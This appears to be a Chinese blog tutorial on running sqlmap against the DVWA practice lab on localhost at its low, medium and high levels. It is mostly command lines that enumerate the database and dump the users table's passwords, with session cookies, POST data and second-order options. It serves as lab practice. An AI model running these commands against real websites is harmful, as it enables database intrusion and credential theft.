dvwa的三个模式下sqlmap命令一把梭哈
本文章仅用于学习,禁止用于其他
文章目录
- 前言
- 一、sqlmap工具(kali自带)
- 二、DVWA靶场三种模式下sqlmap使用
- Low级别
- 爆库
- 爆表
- 爆字段
- 爆密码
- medium
- 爆库
- 爆表
- 爆字段
- 爆密码
- high
- 爆库
- 爆表
- 爆字段
- 爆密码
- 总结
前言
SQL注入(SQL Injection,简称SQLi)是一种常见的网络安全攻击手段。攻击者通过在Web应用程序的输入字段(如表单输入框、URL参数等)中注入恶意的SQL代码,从而欺骗数据库执行这些非预期的指令。这种攻击通常发生在应用程序对用户输入的数据未进行充分验证和过滤的情况下
一、sqlmap工具(kali自带)
所需环境:burpsuite,python2.7.18,pikachu,sqlmap1.5,phpstudy7以下
sqlmap1.9需配置python3.6以上环境
kali上只需要安装好burpsuite就行
二、DVWA靶场三种模式下sqlmap使用
Low级别
爆库
python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch --current-db
这里–cookie值抓包查看
–batch --current-db爆数据库
kali版
sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch --current-db
爆表
python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -tables
-D+数据库 -tables查表
kali版
sqlmap -u "http://127.0.0.1/01/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --batch -D dvwa -tables
爆字段
python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -columns
爆密码
python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=u7kr4u786asmevlpqvg07nt8t2" --batch -D dvwa -T users -C user,password -dump
-T+表 -C+查询密码和用户名 -dump打印
medium
Medium+ --data
爆库
python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?" --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data "id=1&Submit=Submit" --current-db
爆表
python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?" --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data "id=1&Submit=Submit" --batch -D dvwa -tables
爆字段
python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?" --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data "id=1&Submit=Submit" --batch -D dvwa -columns
爆密码
python sqlmap的环境安装路径\sqlmap.py -u "http://127.0.0.1/01/vulnerabilities/sqli/?" --cookie="security=medium; PHPSESSID=fpghhenonb58lv7b5gfsgajk87" --data "id=1&Submit=Submit" --batch -D dvwa -T users -C user,password -dump
high
high+ --second-url注入
爆库
python sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --current-db
爆表
python sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -tables
爆字段
python sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -columns
爆密码
python sqlmap的环境安装路径\sqlmap.py -u "127.0.0.1/01/vulnerabilities/sqli/session-input.php#" --data "id=1&Submit=Submit" --cookie="id=1;security=high; PHPSESSID=1ndi0p1u3f7g535olfbotrjo80" --second-url "http://127.0.0.1/01/vulnerabilities/sqli/" --batch -D dvwa -T users -C user,password -dump
总结
当应用程序将用户输入直接拼接到SQL查询语句中时,攻击者可以构造恶意输入,改变原本SQL语句的结构和逻辑,进而实现对数据库的非法操作。例如,攻击者可以通过SQL注入绕过身份验证、获取敏感信息(如用户密码、信用卡信息等)、篡改数据或执行其他恶意操作